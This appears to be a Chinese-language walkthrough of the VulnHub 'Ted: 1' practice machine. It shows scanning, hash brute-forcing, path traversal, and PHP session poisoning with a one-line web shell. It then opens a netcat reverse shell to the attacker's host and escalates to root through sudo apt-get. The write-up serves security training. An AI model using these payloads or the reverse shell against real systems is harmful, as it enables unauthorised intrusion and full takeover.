机下载地址：

Ted: 1 ~ VulnHubTed: 1, made by Avraham Cohen. Download & walkthrough links are available.https://www.vulnhub.com/entry/ted-1,327/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.59.0/24|grep -B 2 '00:0C:29:08:7C:8A'

1.2. 端口扫描

nmap 192.168.59.134 -p- -A

1.3. 目录扫描

dirb http://192.168.59.134

1.4. 敏感信息获取

whatweb http://192.168.59.134

2. WEB打点寻找漏洞点

2.1. 访问80端口

1，尝试了弱密码爆破+万能密码绕过都不行，网页源代码也没有可利用信息；

2.输入账号密码后，利用burp抓包进行测试，发现需要使用hash加密；

3.将密码本转为Hash值，将加密后的值转化为大写后爆破；-> 发现密码为admin加密值为：

8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

4.尝试登陆 -> 登陆成功

5.通过页面的功能点测试，发现，在搜索框存在任意文件读取漏洞；

../../../../../etc/passwd

6.尝试包含用来存储用户session的文件，从而获取shell，抓取一个有session的请求包，拿到session

7nn7b01pulm3pq0kbkg525bg73

7.拼接路径search读取存储用户session的文件

/var/lib/php/sessions/sess_7nn7b01pulm3pq0kbkg525bg73
#  /var/lib/php/sessions/sess_自己的Session

8.还是拼接上面那个路径，并进行抓包

抓包将数据包放到重放模块里进行测试，发现可以修改user_pref变量的值，从而写入到session文件中，再结合文件包含漏洞，造成RCE的漏洞【重复放两次，一次写入，一次查看】

9.写入URL编码后的一句话木马，输入任意信息点击搜索！ 【若靶机在本机记得关闭杀软】

# 源代码 <?php system($_POST["cmd"]); ?> 输入编译后的->
%3C%3Fphp%20system%28%24_POST%5B%22cmd%22%5D%29%3B%20%3F%3E

-> 开始修改数据包

>>>1，数据包的user_pref=后面url拼接编码后的代码：%3C%3Fphp%20system%28%24_POST%5B%22cmd%22%5D%29%3B%20%3F%3E

>>>2，搜索框即search=后面拼接刚刚的session文件那个路径，/var/lib/php/sessions/sess_7nn7b01pulm3pq0kbkg525bg73

>>>3，路径后续拼接&cmd=测试的命令

数据包大致如下所示，具体请看编号：

2.2. GetShell

1，写入反弹shell语句，kali开启监听，成功反弹到shell

# kali打开监听
nc -lvnp 4444# 输入命令
nc+192.168.59.135+4444+-e+/bin/bash

2，利用 Python 构造一个交互式的shell窗口

python -c 'import pty;pty.spawn("/bin/bash")'

3. 权限提升

1，老规矩，sudo -l查看可执行的命令及权限 -> 存在root权限的命令文件

sudo -l
# /usr/bin/apt-get

2，利用网站资源查取这个文件的提权命令；

https://gtfobins.github.io/

sudo apt-get changelog apt
!/bin/sh

权限提升成功